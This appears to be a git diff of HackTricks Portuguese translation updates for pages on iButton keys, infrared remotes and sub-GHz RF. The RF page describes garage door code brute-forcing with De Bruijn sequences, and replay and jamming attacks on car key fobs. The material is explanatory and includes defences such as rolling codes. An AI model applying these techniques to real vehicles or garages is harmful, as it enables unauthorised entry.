* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

46
todo/radio-hacking/ibutton.md
View file

@ -2,47 +2,49 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) **grupo do Discord** ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Introdução
iButton é um nome genérico para uma chave de identificação eletrônica embalada em um **recipiente de metal em forma de moeda**. Também é chamado de **Dallas Touch** Memory ou memória de contato. Embora muitas vezes seja erroneamente referido como uma chave "magnética", não há **nada magnético** nele. Na verdade, um microchip completo operando em um protocolo digital está escondido dentro.
iButton é um nome genérico para uma chave de identificação eletrônica embalada em um **recipiente metálico em forma de moeda**. Também é chamado de **Dallas Touch** Memory ou memória de contato. Embora muitas vezes seja erroneamente referido como uma chave “magnética”, não há **nada magnético** nela. Na verdade, um **microchip** completo operando em um protocolo digital está escondido dentro.
<figure><img src="../../.gitbook/assets/image (19).png" alt=""><figcaption></figcaption></figure>
### O que é iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>
Normalmente, iButton implica a forma física da chave e do leitor - uma moeda redonda com dois contatos. Para o quadro que o rodeia, existem muitas variações, desde o suporte de plástico mais comum com um furo até anéis, pingentes, etc.
Geralmente, iButton implica a forma física da chave e do leitor - uma moeda redonda com dois contatos. Para a moldura ao redor, existem muitas variações, desde o suporte de plástico mais comum com um furo até anéis, pingentes, etc.
<figure><img src="../../.gitbook/assets/image (23) (2).png" alt=""><figcaption></figcaption></figure>
Quando a chave chega ao leitor, os **contatos se tocam** e a chave é alimentada para **transmitir** seu ID. Às vezes, a chave **não é lida** imediatamente porque o **PSD de contato de um interfone é maior** do que deveria ser. Então, os contornos externos da chave e do leitor não puderam se tocar. Se esse for o caso, você terá que pressionar a chave sobre uma das paredes do leitor.
Quando a chave alcança o leitor, os **contatos se tocam** e a chave é alimentada para **transmitir** seu ID. Às vezes, a chave **não é lida** imediatamente porque o **PSD de contato de um interfone é maior** do que deveria ser. Então, os contornos externos da chave e do leitor não conseguem se tocar. Se esse for o caso, você terá que pressionar a chave sobre uma das paredes do leitor.
<figure><img src="../../.gitbook/assets/image (21) (2).png" alt=""><figcaption></figcaption></figure>
### **Protocolo 1-Wire** <a href="#1-wire-protocol" id="1-wire-protocol"></a>
As chaves Dallas trocam dados usando o protocolo 1-wire. Com apenas um contato para transferência de dados (!!) em ambas as direções, do mestre para o escravo e vice-versa. O protocolo 1-wire funciona de acordo com o modelo Mestre-Escravo. Nessa topologia, o Mestre sempre inicia a comunicação e o Escravo segue suas instruções.
As chaves Dallas trocam dados usando o protocolo 1-wire. Com apenas um contato para transferência de dados (!!) em ambas as direções, do mestre para o escravo e vice-versa. O protocolo 1-wire funciona de acordo com o modelo Mestre-Escravo. Nesta topologia, o Mestre sempre inicia a comunicação e o Escravo segue suas instruções.
Quando a chave (Escravo) entra em contato com o interfone (Mestre), o chip dentro da chave é ligado, alimentado pelo interfone, e a chave é inicializada. Em seguida, o interfone solicita o ID da chave. A seguir, veremos esse processo com mais detalhes.
Quando a chave (Escravo) entra em contato com o interfone (Mestre), o chip dentro da chave liga, alimentado pelo interfone, e a chave é inicializada. Seguindo isso, o interfone solicita o ID da chave. A seguir, vamos examinar esse processo com mais detalhes.
O Flipper pode funcionar nos modos Mestre e Escravo. No modo de leitura de chave, o Flipper age como um leitor, ou seja, funciona como um Mestre. E no modo de emulação de chave, o Flipper finge ser uma chave, está no modo Escravo.
O Flipper pode funcionar tanto nos modos Mestre quanto Escravo. No modo de leitura da chave, o Flipper age como um leitor, ou seja, funciona como um Mestre. E no modo de emulação da chave, o flipper finge ser uma chave, está no modo Escravo.
### Chaves Dallas, Cyfral e Metakom
### Chaves Dallas, Cyfral & Metakom
Para obter informações sobre como essas chaves funcionam, consulte a página [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
Para informações sobre como essas chaves funcionam, verifique a página [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
### Ataques
As chaves iButton podem ser atacadas com o Flipper Zero:
iButtons podem ser atacados com Flipper Zero:
{% content-ref url="flipper-zero/fz-ibutton.md" %}
[fz-ibutton.md](flipper-zero/fz-ibutton.md)
@ -54,12 +56,14 @@ As chaves iButton podem ser atacadas com o Flipper Zero:
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) **grupo do Discord** ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

85
todo/radio-hacking/infrared.md
View file

@ -2,76 +2,105 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Como o Infravermelho Funciona <a href="#how-the-infrared-port-works" id="how-the-infrared-port-works"></a>
## Como Funciona o Infravermelho <a href="#how-the-infrared-port-works" id="how-the-infrared-port-works"></a>
**A luz infravermelha é invisível para os humanos**. O comprimento de onda do infravermelho varia de **0,7 a 1000 mícrons**. Os controles remotos usam um sinal de infravermelho para transmissão de dados e operam na faixa de comprimento de onda de 0,75 a 1,4 mícrons. Um microcontrolador no controle remoto faz com que um LED infravermelho pisque com uma frequência específica, transformando o sinal digital em um sinal de infravermelho.
**A luz infravermelha é invisível para os humanos**. O comprimento de onda do IR é de **0,7 a 1000 microns**. Controles remotos domésticos usam um sinal de IR para transmissão de dados e operam na faixa de comprimento de onda de 0,75..1,4 microns. Um microcontrolador no controle faz um LED infravermelho piscar com uma frequência específica, transformando o sinal digital em um sinal de IR.
Para receber sinais de infravermelho, é usado um **fotoreceptor**. Ele **converte a luz infravermelha em pulsos de tensão**, que já são **sinais digitais**. Geralmente, há um **filtro de luz escura dentro do receptor**, que permite passar **apenas o comprimento de onda desejado** e corta o ruído.
Para receber sinais de IR, é usado um **fotoreceptor**. Ele **converte a luz IR em pulsos de tensão**, que já são **sinais digitais**. Geralmente, há um **filtro de luz escura dentro do receptor**, que permite **apenas a passagem do comprimento de onda desejado** e elimina ruídos.
### Variedade de Protocolos de Infravermelho <a href="#variety-of-ir-protocols" id="variety-of-ir-protocols"></a>
### Variedade de Protocolos IR <a href="#variety-of-ir-protocols" id="variety-of-ir-protocols"></a>
Os protocolos de infravermelho diferem em 3 fatores:
Os protocolos IR diferem em 3 fatores:
* codificação de bits
* estrutura de dados
* frequência do portador - geralmente na faixa de 36 a 38 kHz
* frequência portadora — geralmente na faixa de 36..38 kHz
#### Formas de Codificação de Bits <a href="#bit-encoding-ways" id="bit-encoding-ways"></a>
#### Formas de codificação de bits <a href="#bit-encoding-ways" id="bit-encoding-ways"></a>
**1. Codificação de Distância de Pulso**
**1. Codificação por Distância de Pulso**
Os bits são codificados pela modulação da duração do espaço entre os pulsos. A largura do próprio pulso é constante.
Os bits são codificados modulando a duração do espaço entre os pulsos. A largura do pulso em si é constante.
<figure><img src="../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
**2. Codificação de Largura de Pulso**
**2. Codificação por Largura de Pulso**
Os bits são codificados pela modulação da largura do pulso. A largura do espaço após a explosão do pulso é constante.
Os bits são codificados pela modulação da largura do pulso. A largura do espaço após o pulso é constante.
<figure><img src="../../.gitbook/assets/image (29) (1).png" alt=""><figcaption></figcaption></figure>
**3. Codificação de Fase**
Também é conhecida como codificação Manchester. O valor lógico é definido pela polaridade da transição entre a explosão do pulso e o espaço. "Espaço para explosão de pulso" denota lógica "0", "explosão de pulso para espaço" denota lógica "1".
Também é conhecida como codificação Manchester. O valor lógico é definido pela polaridade da transição entre o pulso e o espaço. "Espaço para pulso" denota lógica "0", "pulso para espaço" denota lógica "1".
<figure><img src="../../.gitbook/assets/image (25).png" alt=""><figcaption></figcaption></figure>
**4. Combinação dos anteriores e outros exóticos**
**4. Combinação dos anteriores e outras exóticas**
{% hint style="info" %}
Existem protocolos de infravermelho que estão **tentando se tornar universais** para vários tipos de dispositivos. Os mais famosos são RC5 e NEC. Infelizmente, o mais famoso **não significa o mais comum**. Em meu ambiente, encontrei apenas dois controles remotos NEC e nenhum RC5.
Existem protocolos IR que estão **tentando se tornar universais** para vários tipos de dispositivos. Os mais famosos são RC5 e NEC. Infelizmente, o mais famoso **não significa o mais comum**. No meu ambiente, encontrei apenas dois controles remotos NEC e nenhum RC5.
Os fabricantes adoram usar seus próprios protocolos de infravermelho exclusivos, mesmo dentro da mesma faixa de dispositivos (por exemplo, TV-boxes). Portanto, controles remotos de diferentes empresas e às vezes de modelos diferentes da mesma empresa, não conseguem trabalhar com outros dispositivos do mesmo tipo.
Os fabricantes adoram usar seus próprios protocolos IR únicos, mesmo dentro da mesma gama de dispositivos (por exemplo, TV-boxes). Portanto, controles de diferentes empresas e às vezes de diferentes modelos da mesma empresa, são incapazes de trabalhar com outros dispositivos do mesmo tipo.
{% endhint %}
### Explorando um Sinal de Infravermelho
### Explorando um sinal de IR
A maneira mais confiável de ver como o sinal de infravermelho do controle remoto se parece é usar um osciloscópio. Ele não demodula nem inverte o sinal recebido, ele é apenas exibido "como está". Isso é útil para testes e depuração. Mostrarei o sinal esperado no exemplo do protocolo NEC de infravermelho.
A maneira mais confiável de ver como o sinal de IR do controle remoto se parece é usar um osciloscópio. Ele não demodula ou inverte o sinal recebido, ele é apenas exibido "como é". Isso é útil para testes e depuração. Mostrarei o sinal esperado no exemplo do protocolo IR NEC.
<figure><img src="../../.gitbook/assets/image (18) (2).png" alt=""><figcaption></figcaption></figure>
Geralmente, há um preâmbulo no início de um pacote codificado. Isso permite que o receptor determine o nível de ganho e fundo. Existem também protocolos sem preâmbulo, por exemplo, Sharp.
Geralmente, há um preâmbulo no início de um pacote codificado. Isso permite que o receptor determine o nível de ganho e o fundo. Há também protocolos sem preâmbulo, por exemplo, Sharp.
Em seguida, os dados são transmitidos. A estrutura, o preâmbulo e o método de codificação de bits são determinados pelo protocolo específico.
O **protocolo NEC de infravermelho** contém um comando curto e um código de repetição, que é enviado enquanto o botão é pressionado. Tanto o comando quanto o código de repetição têm o mesmo preâmbulo no início.
O **protocolo IR NEC** contém um comando curto e um código de repetição, que é enviado enquanto o botão é pressionado. Tanto o comando quanto o código de repetição têm o mesmo preâmbulo no início.
O **comando NEC**, além do preâmbulo, consiste em um byte de endereço e um byte de número de comando, pelo qual o dispositivo entende o que precisa ser executado. Os bytes de endereço e número de comando são duplicados com valores inversos, para verificar a integridade da transmissão. Há um bit de parada adicional no final do comando.
O **código de repetição** tem um "1" após o preâmbulo, que é um bit de parada.
Para a lógica "0" e "1", a NEC usa a Codificação de Distância de Pulso: primeiro, uma explosão de pulso é transmitida, após a qual há uma pausa, cujo comprimento define o valor do bit.
Para **lógica "0" e "1"** NEC usa Codificação por Distância de Pulso: primeiro, um pulso é transmitido após o qual há uma pausa, seu comprimento define o valor do bit.
### Condicionadores de Ar
### Ar Condicionados
Ao contrário de outros controles remotos, **os condicionadores de ar não transmitem apenas o código do botão pressionado**. Eles também **transmitem todas as informações** quando um botão é pressionado para garant
Diferentemente de outros controles remotos, **os ar condicionados não transmitem apenas o código do botão pressionado**. Eles também **transmitem todas as informações** quando um botão é pressionado para garantir que a **máquina de ar condicionado e o controle remoto estejam sincronizados**.\
Isso evitará que uma máquina ajustada para 20ºC seja aumentada para 21ºC com um controle remoto, e então, quando outro controle remoto, que ainda tem a temperatura como 20ºC, for usado para aumentar mais a temperatura, ele "aumentará" para 21ºC (e não para 22ºC pensando que está em 21ºC).
### Ataques
Você pode atacar Infravermelho com Flipper Zero:
{% content-ref url="flipper-zero/fz-infrared.md" %}
[fz-infrared.md](flipper-zero/fz-infrared.md)
{% endcontent-ref %}
## Referências
* [https://blog.flipperzero.one/infrared/](https://blog.flipperzero.one/infrared/)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

79
todo/radio-hacking/sub-ghz-rf.md
View file

@ -2,46 +2,48 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Portas de Garagem
## Portões de Garagem
Os abridores de portas de garagem geralmente operam em frequências na faixa de 300-190 MHz, sendo as frequências mais comuns 300 MHz, 310 MHz, 315 MHz e 390 MHz. Essa faixa de frequência é comumente usada para abridores de portas de garagem porque é menos congestionada do que outras bandas de frequência e tem menos probabilidade de sofrer interferência de outros dispositivos.
Os abridores de portões de garagem normalmente operam em frequências na faixa de 300-190 MHz, sendo as frequências mais comuns 300 MHz, 310 MHz, 315 MHz e 390 MHz. Essa faixa de frequência é comumente usada para abridores de portões de garagem porque é menos congestionada do que outras bandas de frequência e tem menos probabilidade de sofrer interferência de outros dispositivos.
## Portas de Carro
## Portas de Carros
A maioria dos controles remotos de chave de carro opera em **315 MHz ou 433 MHz**. Essas são frequências de rádio e são usadas em uma variedade de aplicações diferentes. A principal diferença entre as duas frequências é que 433 MHz tem um alcance maior do que 315 MHz. Isso significa que 433 MHz é melhor para aplicações que requerem um alcance maior, como entrada remota sem chave.\
Na Europa, é comum usar 433,92 MHz e nos EUA e no Japão é 315 MHz.
A maioria dos controles remotos de chaves de carro opera em **315 MHz ou 433 MHz**. Ambas são frequências de rádio e são usadas em uma variedade de aplicações diferentes. A principal diferença entre as duas frequências é que 433 MHz tem um alcance maior do que 315 MHz. Isso significa que 433 MHz é melhor para aplicações que exigem um alcance maior, como entrada sem chave remota.\
Na Europa, 433,92 MHz é comumente usado e nos EUA e Japão é o 315 MHz.
## **Ataque de Força Bruta**
<figure><img src="../../.gitbook/assets/image (4) (3) (2).png" alt=""><figcaption></figcaption></figure>
Se, em vez de enviar cada código 5 vezes (enviado dessa forma para garantir que o receptor o receba), você enviar apenas uma vez, o tempo é reduzido para 6 minutos:
Se, em vez de enviar cada código 5 vezes (enviado assim para garantir que o receptor o receba), enviar apenas uma vez, o tempo é reduzido para 6 minutos:
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (2).png" alt=""><figcaption></figcaption></figure>
e se você **remover o período de espera de 2 ms** entre os sinais, você pode **reduzir o tempo para 3 minutos**.
e se você **remover o período de espera de 2 ms** entre os sinais, pode **reduzir o tempo para 3 minutos.**
Além disso, usando a Sequência de De Bruijn (uma maneira de reduzir o número de bits necessários para enviar todos os números binários potenciais para força bruta), esse **tempo é reduzido para apenas 8 segundos**:
<figure><img src="../../.gitbook/assets/image (5) (2) (3).png" alt=""><figcaption></figcaption></figure>
Um exemplo desse ataque foi implementado em [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)
Exemplo deste ataque foi implementado em [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)
Exigir **um preâmbulo evitará a otimização da Sequência de De Bruijn** e **códigos rolantes impedirão esse ataque** (supondo que o código seja longo o suficiente para não ser força bruta).
Exigir **um preâmbulo evitará a otimização da Sequência de De Bruijn** e **códigos rolantes impedirão este ataque** (supondo que o código seja longo o suficiente para não ser forçado).
## Ataque Sub-GHz
Para atacar esses sinais com o Flipper Zero, verifique:
Para atacar esses sinais com Flipper Zero, confira:
{% content-ref url="flipper-zero/fz-sub-ghz.md" %}
[fz-sub-ghz.md](flipper-zero/fz-sub-ghz.md)
@ -49,45 +51,46 @@ Para atacar esses sinais com o Flipper Zero, verifique:
## Proteção de Códigos Rolantes
Os abridores automáticos de portas de garagem geralmente usam um controle remoto sem fio para abrir e fechar a porta da garagem. O controle remoto **envia um sinal de frequência de rádio (RF)** para o abridor da porta da garagem, que ativa o motor para abrir ou fechar a porta.
Abridores automáticos de portões de garagem normalmente usam um controle remoto sem fio para abrir e fechar o portão da garagem. O controle remoto **envia um sinal de frequência de rádio (RF)** para o abridor de portão da garagem, que ativa o motor para abrir ou fechar o portão.
É possível para alguém usar um dispositivo conhecido como um capturador de código para interceptar o sinal de RF e gravá-lo para uso posterior. Isso é conhecido como um **ataque de repetição**. Para evitar esse tipo de ataque, muitos abridores modernos de portas de garagem usam um método de criptografia mais seguro conhecido como um sistema de **código rolante**.
É possível que alguém use um dispositivo conhecido como capturador de código para interceptar o sinal de RF e gravá-lo para uso posterior. Isso é conhecido como **ataque de replay**. Para prevenir esse tipo de ataque, muitos abridores de portões de garagem modernos usam um método de criptografia mais seguro conhecido como sistema de **código rolante**.
O **sinal de RF é transmitido usando um código rolante**, o que significa que o código muda a cada uso. Isso torna **difícil** para alguém **interceptar** o sinal e **usá-lo** para obter acesso **não autorizado** à garagem.
O **sinal de RF é tipicamente transmitido usando um código rolante**, o que significa que o código muda a cada uso. Isso torna **difícil** para alguém **interceptar** o sinal e **usá-lo** para ganhar acesso **não autorizado** à garagem.
Em um sistema de código rolante, o controle remoto e o abridor da porta da garagem têm um **algoritmo compartilhado** que **gera um novo código** cada vez que o controle remoto é usado. O abridor da porta da garagem só responderá ao **código correto**, tornando muito mais difícil para alguém obter acesso não autorizado à garagem apenas capturando um código.
Em um sistema de código rolante, o controle remoto e o abridor de portão da garagem têm um **algoritmo compartilhado** que **gera um novo código** toda vez que o controle é usado. O abridor de portão da garagem só responderá ao **código correto**, tornando muito mais difícil para alguém ganhar acesso não autorizado à garagem apenas capturando um código.
### **Ataque de Elo Perdido**
### **Ataque de Link Ausente**
Basicamente, você ouve o botão e **captura o sinal enquanto o controle remoto está fora do alcance** do dispositivo (digamos o carro ou a garagem). Em seguida, você se move para o dispositivo e **usa o código capturado para abri-lo**.
Basicamente, você escuta o botão e **captura o sinal enquanto o controle remoto está fora do alcance** do dispositivo (digamos, o carro ou a garagem). Você então se move para o dispositivo e **usa o código capturado para abri-lo**.
### Ataque de Jamming de Link Completo
Um atacante pode **interferir no sinal perto do veículo ou receptor** para que o **receptor não consiga 'ouvir' o código**, e uma vez que isso esteja acontecendo, você pode simplesmente **capturar e reproduzir** o código quando parar de interferir.
Um atacante poderia **bloquear o sinal perto do veículo ou receptor** para que o **receptor não possa realmente 'ouvir' o código**, e uma vez que isso esteja acontecendo, você pode simplesmente **capturar e reproduzir** o código quando tiver parado de bloquear.
A vítima em algum momento usará as **chaves para trancar o carro**, mas então o ataque terá **gravado códigos de "fechar a porta" suficientes** que, esperançosamente, poderiam ser reenviados para abrir a porta (uma **mudança de frequência pode ser necessária**, pois existem carros que usam os mesmos códigos para abrir e fechar, mas ouvem ambos os comandos em frequências diferentes).
A vítima em algum momento usará as **chaves para trancar o carro**, mas então o ataque terá **gravado códigos suficientes de 'fechar porta'** que, esperançosamente, poderiam ser reenviados para abrir a porta (uma **mudança de frequência pode ser necessária** já que há carros que usam os mesmos códigos para abrir e fechar, mas ouvem ambos os comandos em frequências diferentes).
{% hint style="warning" %}
